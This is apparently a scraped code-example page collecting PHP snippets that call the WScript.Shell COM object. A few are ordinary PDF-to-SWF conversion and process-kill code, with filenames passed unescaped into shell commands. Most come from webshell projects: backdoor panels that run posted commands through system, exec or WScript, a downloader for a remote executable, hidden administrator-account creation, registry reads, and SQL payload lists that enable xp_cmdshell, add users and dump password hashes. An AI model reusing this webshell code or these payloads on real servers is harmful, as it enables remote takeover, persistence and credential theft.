コード例 #1
0
ファイル: file_upload.php プロジェクト: dalinhuang/back
function pdf2swf($input, $output)
{
    $command = "pdf2swf.exe -t \"" . $input . "\" -o \"" . $output . "\" -s flashversion=9 ";
    //		echo $command;
    $Shell = new COM("WScript.shell") or die("创建COM失败");
    $oExec = $Shell->exec($command);
}
コード例 #2
0
ファイル: wrun.php プロジェクト: holg/E2Transcoder
 public function stop()
 {
     $command = 'cmd /c taskkill /f /PID ' . $this->pid;
     error_log($command);
     $WshShell = new COM("WScript.Shell");
     $oExec = $WshShell->exec($command);
     if ($this->status() == false) {
         return true;
     } else {
         return false;
     }
 }
コード例 #3
0
ファイル: erne.php プロジェクト: ASDAFF/Shells-Database
        } elseif ($execfunc == "passthru") {
            passthru($_POST['command']);
        } elseif ($execfunc == "exec") {
            $result = exec($_POST['command']);
            echo $result;
        } elseif ($execfunc == "shell_exec") {
            $result = shell_exec($_POST['command']);
            echo $result;
        } elseif ($execfunc == "popen") {
            $pp = popen($_POST['command'], 'r');
            $read = fread($pp, 2096);
            echo $read;
            pclose($pp);
        } elseif ($execfunc == "wscript") {
            $wsh = new COM('W' . 'Scr' . 'ip' . 't.she' . 'll') or die("PHP Create COM WSHSHELL failed");
            $exec = $wsh->exec("cm" . "d.e" . "xe /c " . $_POST['command'] . "");
            $stdout = $exec->StdOut();
            $stroutput = $stdout->ReadAll();
            echo $stroutput;
        } else {
            system($_POST['command']);
        }
    }
    echo "</textarea></td></tr></form></table>";
    exit;
}
//end shell
if ($_POST['editfile']) {
    $fp = fopen($_POST['editfile'], "r");
    $filearr = file($_POST['editfile']);
    foreach ($filearr as $string) {
コード例 #4
0
ファイル: 2009mssql.php プロジェクト: mcanv/webshell
 formhead(array('title' => 'Execute Command'));
 makehide('action', 'shell');
 if (IS_WIN && IS_COM) {
     $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
     makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
 }
 p('<p>');
 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => htmlspecialchars($command)));
 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
 p('</p>');
 formfoot();
 if ($command) {
     p('<hr width="100%" noshade /><pre>');
     if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
         $wsh = new COM('WScript.shell');
         $exec = $wsh->exec('cmd.exe /c ' . $command);
         $stdout = $exec->StdOut();
         $stroutput = $stdout->ReadAll();
         echo $stroutput;
     } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
         $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
         $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
         if (is_resource($process)) {
             fwrite($pipes[0], $command . "\r\n");
             fwrite($pipes[0], "exit\r\n");
             fclose($pipes[0]);
             while (!feof($pipes[1])) {
                 echo fgets($pipes[1], 1024);
             }
             fclose($pipes[1]);
             while (!feof($pipes[2])) {
コード例 #5
0
ファイル: godshell.php プロジェクト: huntergregal/tools
 }
 formhead(array('title' => 'Execute Command'));
 makehide('haz', 'sh');
 if (IS_WIN && IS_COM) {
     $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
     makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
 }
 p('<p>');
 makeinput(array('title' => 'Command', 'name' => 'ex', 'value' => $ex));
 makeinput(array('class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
 p("</p>\n</form>");
 if ($ex) {
     p('<hr width="100%" noshade><pre>');
     if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
         $wsh = new COM('WScript.shell');
         $exec = $wsh->exec('cmd.exe /c ' . $ex);
         $stdout = $exec->StdOut();
         $stroutput = $stdout->ReadAll();
         echo $stroutput;
     } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
         $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
         $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
         if (is_resource($process)) {
             fwrite($pipes[0], $ex . "\r\n");
             fwrite($pipes[0], "exit\r\n");
             fclose($pipes[0]);
             while (!feof($pipes[1])) {
                 echo fgets($pipes[1], 1024);
             }
             fclose($pipes[1]);
             while (!feof($pipes[2])) {
コード例 #6
0
ファイル: silic.php プロジェクト: evil7/webshell
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    if ($_GET['winshell'] == 'wscript') {
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $ww = $wcpth . " /c " . $wcmd;
            $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] = 'do') {
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '����: ' . $e->getMessage();
            }
            echo $registry_proxystring;
        }
    } else {
        $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
    }
}
コード例 #7
0
function Com_h()
{
    $object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
    print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a> 
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
    if ($object == 'downloader') {
        $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
        $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe');
        print <<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
        if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
            echo '<div class="actall">';
            $contents = @file_get_contents($_POST['durl']);
            if (!$contents) {
                echo '无法下载数据';
            } else {
                echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败';
            }
            echo '</div>';
        }
    } elseif ($object == 'wscript') {
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        print <<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
        if (!empty($_POST['cmd'])) {
            echo '<div class="actall">';
            $shell = new COM('wscript');
            $exe = @$shell->exec("cmd.exe /c " . $cmd);
            $out = $exe->StdOut();
            $output = $out->ReadAll();
            echo '<pre>' . $output . '</pre>';
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    } elseif ($object == 'application') {
        $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt';
        print <<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
        if (!empty($_POST['run'])) {
            echo '<div class="actall">';
            $shell = new COM('application');
            echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败';
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    } elseif ($object == 'adodb') {
        $string = isset($_POST['string']) ? $_POST['string'] : '';
        $sql = isset($_POST['sql']) ? $_POST['sql'] : '';
        print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==5) return false;
\tStr = new Array(12);  
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";
\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**";
\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**";
\tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
\tStr[6] = "SELECT * FROM [TableName] WHERE ID<10";
\tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')";
\tStr[8] = "DELETE FROM [TableName] WHERE ID=1";
\tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1";
\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[11] = "DROP TABLE [TableName]";
\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
\tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
<option value="13">删除字段</option>
</select></div>
<div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div>
</form>
END;
        if (!empty($string)) {
            echo '<div class="actall">';
            $shell = new COM('adodb');
            @$shell->Open($string);
            $result = @$shell->Execute($sql);
            $count = $result->Fields->Count();
            for ($i = 0; $i < $count; $i++) {
                $Field[$i] = $result->Fields($i);
            }
            echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>';
            if (!empty($count)) {
                while (!$result->EOF) {
                    for ($i = 0; $i < $count; $i++) {
                        echo htmlspecialchars($Field[$i]->value) . '<br>';
                    }
                    @$result->MoveNext();
                }
            }
            $shell->Close();
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    }
    return true;
}
コード例 #8
0
ファイル: r00ts php大马.php プロジェクト: mcanv/webshell
function Com_h()
{
    $object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
    $com = array("adodb" => "ADODB.Connection", "wscript" => "WScript.shell", "application" => "Shell.Application");
    print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a></div>
<div class="actall" style="height:200px;">
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br>
END;
    $shell = new COM($com[$object]);
    if ($object == 'wscript') {
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe';
        print <<<END
&nbspcmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br>
command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<input class="bt" type="submit" value="execute"></form><br>
END;
        if (!empty($_POST['cmd'])) {
            $exe = @$shell->exec("{$cmdpath} /c " . $cmd);
            $out = $exe->StdOut();
            $output = $out->ReadAll();
            echo '<pre>' . $output . '</pre>';
        }
    } elseif ($object == 'application') {
        $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\windows\\php.ini c:\\php.ini';
        print <<<END
Path:<br><input type="text" name="run" value="{$run}" style="width:600px;">
<br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<br><br><input class="bt" type="submit" value="execute"></form><br>
END;
        if (!empty($_POST['run'])) {
            echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? 'Done' : 'Faild';
        }
    } elseif ($object == 'adodb') {
        $string = isset($_POST['string']) ? $_POST['string'] : '';
        $sql = isset($_POST['sql']) ? $_POST['sql'] : '';
        print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==10) return false;
\tStr = new Array(12);  
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb;Jet OLEDB:Database Password=***";
\tStr[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa";
\tStr[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root";
\tStr[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;";
        Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass";
        Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;";
        Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword";
\tStr[8] = "DSN=mydns;Uid=username;Pwd=password";
        Str[9] = "FILEDNS=c:\\\\path\\\\db.dsn;Uid=username;Pwd=password";
        Str[11] = "SELECT * FROM [TableName] WHERE ID<100";
\tStr[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')";
\tStr[13] = "UPDATE [TableName] SET USER='******' WHERE ID=100";
\tStr[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[15] = "DROP TABLE [TableName]";
\tStr[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
        Str[17] = "select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r abc123 /add');";
        Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')";
        Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')";
        Str[23] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\\info.php';";
\tStr[24] = "sp_makewebtask @outputfile='d:\\\\web\\\test.php',@charset=gb2312,@query='select test';";
        Str[25] = "Exec master.dbo.xp_cmdshell 'ver';";
        Str[26] = "Select Name FROM Master..SysDatabases;";
        Str[27] = "select name from sysobjects where type='U';";
        Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');";
        Str[29] = "select username,password from dba_users;";
        Str[30] = "select TABLE_NAME from all_tables;";
        Str[31] = "desc admin;";
        Str[32] = "grant connect,resource,dba to user_name;";
        Str[33] = "select datname from pg_database;";
        Str[34] = "select relname from pg_stat_user_tables;";
        Str[35] = "\\\\d table_name";
        Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
        Str[37] = "\\\\! uname -a";
        Str[38] = "select schemaname from syscat.schemata;";
        Str[39] = "select name from sysibm.systables;";
        Str[40] = "select colname from syscat.columns where tabname='table_name';";
        Str[41] = "db2 get db cfg for db_name;";
        Str[42] = "select name from sysdatabases;";
        Str[43] = "select tabname from systables where tabid=n;";
        Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;";
        Str[45] = "select username,usertype,password from sysusers;";
        if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--select range--</option>
<option value="1">Access</option>
<option value="2">MsSql</option>
<option value="3">MySql</option>
<option value="4">Oracle</option>
<option value="5">DB2</option>
<option value="6">PostGreSQL</option>
<option value="7">Informix</option>
<option value="8">DSN</option>
<option value="9">FILEDSN</option>
<option value="10">--sql statement--</option>
<option value="11">show data</option>
<option value="12">insert data</option>
<option value="13">update data</option>
<option value="14">create table</option>
<option value="15">drop table</option>
<option value="16">add column</option>
<option value="17">access shell()</option>
<option value="18">add xp_cmdsehll(sql2005)</option>
<option value="19">add oacreate(sql2005)</option>
<option value="20">add openrowset(sql2005)</option>
<option value="21">add xp_cmdsehll(sql2000)</option>
<option value="22">add oacreate(sql2000)</option>
<option value="23">oamethod exec</option>
<option value="24">sp_makewebtask</option>
<option value="25">xp_cmdshell</option>
<option value="26">databases(sql)</option>
<option value="27">tables(sql)</option>
<option value="28">columns(sql)</option>
<option value="29">hashes(oracle)</option>
<option value="30">tables(oracle)</option>
<option value="31">columns(oracle)</option>
<option value="32">grant(oracle)</option>
<option value="33">databases(pgsql)</option>
<option value="34">tables(pgsql)</option>
<option value="35">columns(pgsql)</option>
<option value="36">pg_hba.conf(pgsql)</option>
<option value="37">os-command(pgsql)</option>
<option value="38">databases(db2)</option>
<option value="39">tables(db2)</option>
<option value="40">columns(db2)</option>
<option value="41">db config(db2)</option>
<option value="42">databases(informix)</option>
<option value="43">tables(informix)</option>
<option value="44">columns(informix)</option>
<option value="45">hashes(informix)</option>
</select>
<br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;">
<input class="bt" type="submit" value="execute">
</form><br>
END;
        if (!empty($string)) {
            @$shell->Open($string);
            $result = @$shell->Execute($sql);
            $count = $result->Fields->Count();
            for ($i = 0; $i < $count; $i++) {
                $Field[$i] = $result->Fields($i);
            }
            echo $result ? $sql . ' Done<br>' : $sql . ' Faild<br>';
            if (!empty($count)) {
                while (!$result->EOF) {
                    for ($i = 0; $i < $count; $i++) {
                        echo $Field[$i]->value . '<br>';
                    }
                    @$result->MoveNext();
                }
            }
            $shell->Close();
        }
    }
    $shell = NULL;
    echo '</div>';
    return true;
}
コード例 #9
0
ファイル: Project_asset.php プロジェクト: geek-zwb/htdocs
 /**
  * 文件上传后端处理
  * resumable.js
  * 文件上传处理程序
  * 特别注明:如果要用mkdir()创建中文目录,在UTF-8编码中,需要先使用iconv()将目录str转为gbk格式。具体用法:icon('utf-8','gbk//ignore',$upload_dir);
  * 中文目录在PHP中不规范!!!还涉及到浏览器兼容?
  */
 public function upload($id_project = 1, $id_datalist = 1)
 {
     header("Content-type: text/html;charset=utf-8");
     $REQUEST_METHOD = $_SERVER['REQUEST_METHOD'];
     $uploads_dir = $this->get_doc_path($id_project, $id_datalist);
     $uploads_dir = iconv('utf-8', 'gbk//ignore', $uploads_dir);
     $file_name = '';
     if ($REQUEST_METHOD == "GET") {
         if (count($_GET) > 0) {
             /*$data = $this->input->get();
               $chunkNumber = $_GET['resumableChunkNumber'];
               $chunkSize = $_GET['resumableChunkSize'];
               $totalSize = $_GET['resumableTotalSize'];
               $identifier = $_GET['resumableIdentifier'];
               $filename = iconv ( 'UTF-8', 'GB2312', $_GET ['resumableFilename'] );*/
             $chunkNumber = $this->input->get('resumableChunkNumber');
             $chunkSize = $this->input->get('resumableChunkSize');
             $totalSize = $this->input->get('resumableTotalSize');
             $identifier = $this->input->get('resumableIdentifier');
             $filename = $this->input->get('resumableFilename');
             $filename = iconv('UTF-8', 'gbk//ignore', $filename);
             if ($this->validateRequest($chunkNumber, $chunkSize, $totalSize, $identifier, $filename) == 'valid') {
                 $chunkFilename = $this->getChunkFilename($chunkNumber, $identifier, $filename, $uploads_dir);
                 if (file_exists($chunkFilename)) {
                     header("HTTP/1.0 200 Ok");
                 } else {
                     header("HTTP/1.0 404 Not Found");
                 }
             } else {
                 header("HTTP/1.0 404 Not Found");
                 echo "not_found";
             }
         }
     }
     // loop through files and move the chunks to a temporarily created directory
     ///*将最终文件信息添加到数据库*/
     if ($REQUEST_METHOD == "POST") {
         if (count($_POST) > 0) {
             $client_name = $_POST['resumableFilename'];
             $resumableFilename = iconv('UTF-8', 'gbk//IGNORE', $_POST['resumableFilename']);
             //$resumableFilename = $_POST ['resumableFilename'];
             $resumableIdentifier = $_POST['resumableIdentifier'];
             $resumableChunkNumber = $_POST['resumableChunkNumber'];
             $resumableTotalSize = $_POST['resumableTotalSize'];
             $resumableChunkSize = $_POST['resumableChunkSize'];
             if (!empty($_FILES)) {
                 foreach ($_FILES as $file) {
                     // check the error status
                     if ($file['error'] != 0) {
                         $this->save_log('error ' . $file['error'] . ' in file ' . $resumableFilename);
                         continue;
                     }
                     // init the destination file (format <filename.ext>.part<#chunk>
                     // the file is stored in a temporary directory
                     $temp_dir = $uploads_dir . '/' . $resumableIdentifier;
                     $dest_file = $temp_dir . '/' . $resumableFilename . '.part' . $resumableChunkNumber;
                     // create the temporary directory
                     if (!is_dir($temp_dir)) {
                         mkdir($temp_dir, 0777, true);
                     }
                     // move the temporary file
                     if (!move_uploaded_file($file['tmp_name'], $dest_file)) {
                         $this->save_log('Error saving (move_uploaded_file) chunk ' . $resumableChunkNumber . ' for file ' . $resumableFilename);
                     } else {
                         // check if all the parts present, and create the final destination file
                         //  createFileFromChunks($temp_dir, $resumableFilename, $resumableChunkSize, $resumableTotalSize);
                         $file_name = $this->createFileFromChunks($temp_dir, $resumableFilename, $resumableChunkSize, $resumableTotalSize, $uploads_dir);
                         // echo $file_name;
                     }
                 }
             }
             if ($file_name) {
                 //插入数据库
                 $id_author = $this->session->user_id;
                 date_default_timezone_set('PRC');
                 $date_time = date('Y-m-d H:i:s');
                 $this->gbeModel_db->add_projectDatalistDoc($id_project, $id_datalist, $date_time, $client_name, $id_author, '100', $file_name);
                 $file_path = $uploads_dir . $file_name;
                 $info = pathinfo($file_name, PATHINFO_EXTENSION);
                 if (pathinfo($file_name, PATHINFO_EXTENSION) == 'pdf') {
                     $swf = $uploads_dir . basename($file_name, '.pdf') . '.swf';
                     if (!file_exists($swf)) {
                         if (PATH_SEPARATOR == ';') {
                             // $command= "C:/Program Files (x86)/SWFTools/pdf2swf.exe  -t \"$file_name\" -o  \"$swf\" -s flashversion=9 ";
                             $command = "D:/zhong/SWFTools/pdf2swf.exe  -t " . $file_path . " -o " . $swf . " -s flashversion=9 ";
                             //创建shell对象
                             $WshShell = new COM("WScript.Shell");
                             //执行cmd命令
                             $exec = $WshShell->exec("cmd.exe /C " . $command);
                             $stdout = $exec->StdOut();
                             $stroutput = $stdout->ReadAll();
                             // $result = @system($command,$status);
                         } else {
                             $command = "/data/gbo/swftools/bin/pdf2swf -t " . $file_path . " -o " . $swf . " -s flashversion=9 ";
                             pclose(popen("{$command}", 'r'));
                         }
                     }
                 }
             }
         }
     }
 }
コード例 #10
0
ファイル: Judge_file.php プロジェクト: geek-zwb/htdocs
 /**
  * 在线预览 PDF转SWF
  * @param $file_name
  */
 public function preview($file_name, $project_id, $datalist_id, $pattern = 0)
 {
     header("Content-type:text/html; charset=utf-8");
     $data = $this->get_public->get_data();
     $datalist = $this->gbeModel_main->find_datalist($datalist_id);
     $doc_path = $this->gbeModel_db->get_doc_path($project_id, $datalist);
     // $doc_path = iconv('utf-8','gbk',$doc_path); //文件路径涉及到中文解码gbk.编码不规范,经常出错,改为英文形式
     $swf = $doc_path . basename($file_name, '.pdf') . '.swf';
     $file_name = $doc_path . $file_name;
     if (!file_exists($swf)) {
         if (PATH_SEPARATOR == ';') {
             // $command= "C:/Program Files (x86)/SWFTools/pdf2swf.exe  -t \"$file_name\" -o  \"$swf\" -s flashversion=9 ";
             $command = "D:/zhong/SWFTools/pdf2swf.exe  -t " . $file_name . " -o " . $swf . " -s flashversion=9 ";
             //创建shell对象
             $WshShell = new COM("WScript.Shell");
             //执行cmd命令
             $exec = $WshShell->exec("cmd.exe /C " . $command);
             $stdout = $exec->StdOut();
             $stroutput = $stdout->ReadAll();
             // $result = @system($command,$status);
         } else {
             $command = "/data/gbo/swftools/bin/pdf2swf -t " . $file_name . " -o " . $swf . " -s flashversion=9 ";
             pclose(popen("{$command}", 'r'));
         }
     }
     //网站视图绝对路径
     $preview = VIEWPATH . '/preview.swf';
     if (is_file($preview)) {
         @unlink($preview);
     }
     //将新的swf复制到preview.swf
     copy($swf, $preview);
     //rename($swf,$preview);
     $data['file_name'] = $file_name;
     // $base_url = $this->config->item('base_url').'uploads/';
     //$uploads_url = $this->config->item('uploads_path');
     // $swf = str_replace($uploads_url,$base_url,$swf);
     //$swf = iconv('gbk','utf-8',$swf);
     //将所需要的swf复制为网站根目录的preview.swf
     $data['swf'] = $this->config->item('base_url') . 'application/views/preview.swf';
     // $this->load->view('swf2pdf',$data);
     $result = $this->load->view('swf2pdf', $data, true);
     $data['preview'] = $result;
     $data['datalist_selected'] = $datalist_id;
     $data['project_selected'] = $project_id;
     $this->show($data);
 }
コード例 #11
0
ファイル: help.php プロジェクト: qingxp9/mywebshell
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    if ($_GET['winshell'] == 'wscript') {
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            $ww = $wcpth . " /c " . $wcmd;
            $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
